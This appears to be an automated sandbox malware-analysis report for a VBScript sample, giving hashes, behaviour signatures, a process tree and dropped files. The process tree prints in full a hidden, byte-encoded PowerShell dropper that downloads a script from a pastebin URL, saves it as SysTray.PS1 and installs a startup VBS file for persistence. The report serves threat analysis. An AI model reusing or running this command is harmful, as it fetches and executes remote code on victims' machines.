Overview

overview

10

Static

static

36884fba5e...98.vbs

windows7_x64

10

36884fba5e...98.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    118s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    19-02-2022 09:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    36884fba5e03e2bda056c5345d1e9e2af3d72860c116b0110c9a845fbeb68298.vbs

  • Size

    38KB

  • MD5

    0d16eafc2062d62ca907d9173306297e

  • SHA1

    8c276ce7589c6fe757206ba932fc8f15865869c1

  • SHA256

    36884fba5e03e2bda056c5345d1e9e2af3d72860c116b0110c9a845fbeb68298

  • SHA512

    1190ddc702ca46931a7e08aa0c0aeee59ba2f948cfc1301797e7400236f0cd30ed341fddb3f67105aafcba40b2cd710bb8244833ffdb92eb51724a4b4057b480

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/8AjnXrD3

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36884fba5e03e2bda056c5345d1e9e2af3d72860c116b0110c9a845fbeb68298.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1392
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -WindowStyle Hidden -Command "IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,56,65,106,110,88,114,68,51,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1528

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1.bat
    MD5

    b5870c9131ef96fa9da1c0828fc5660f

    SHA1

    96e7ab6a3bfb21d58966a16bd70c5ab5248bcfed

    SHA256

    8b6dbd7728407ce50e813a7207dbea18709200c452b89e39514abc2e38f76b06

    SHA512

    dfa17e2017ad3c7bc2cf0c76d2558e8c92f14ef0cb1277a1459653ca36438d3daad9796361fa2a6f06df0d5eafbbe79d35dec6830004bc3088a4786360df2542

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
    MD5

    c3a085139e8656f1b19f51d7994ecdde

    SHA1

    892232ef2b63b20ab0572957373a0fee56c58eb9

    SHA256

    a0b8635c9a7ed11f8d279bdbe0e368908ffd31a5caeb7fc9ae491f86347b4c6b

    SHA512

    58583e9e5d6c04f5e267097be02515690ba26c98d2f5afa858a2209c5d973c2b69630341e513fdc3a3fe5d8f4ba96955a8c07d45d750ca2da66b34d32db26041

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    01160da66a396222cd93a20d115072c4

    SHA1

    f8633c77571f3da398930b30a072b8cade642c95

    SHA256

    ade478fcc6ab17a5db4a1d93e14ac18c0c01ad842202f13af9dc293b926a818a

    SHA512

    dce3b19e3b87fb5c1c7fe6f3b35a4905ac7fdddbb96f68ef677b88d6d3d9f4d9d3ebe9e6f26983fedbd279fd99eac9d1ac1c81e3c9a3193fc91ab4d2443d0d70

    Download Submit

  • memory/1004-61-0x00000000026A2000-0x00000000026A4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1004-59-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1004-62-0x00000000026A4000-0x00000000026A7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1004-58-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1004-63-0x00000000026AB000-0x00000000026CA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1004-60-0x00000000026A0000-0x00000000026A2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1528-68-0x00000000028A0000-0x00000000028A2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1528-67-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1528-69-0x00000000028A2000-0x00000000028A4000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1528-70-0x00000000028A4000-0x00000000028A7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1528-71-0x000000001B780000-0x000000001BA7F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/1528-66-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/1528-73-0x00000000028AB000-0x00000000028CA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1596-55-0x000007FEFBE21000-0x000007FEFBE23000-memory.dmp

    Filesize

    8KB

    Download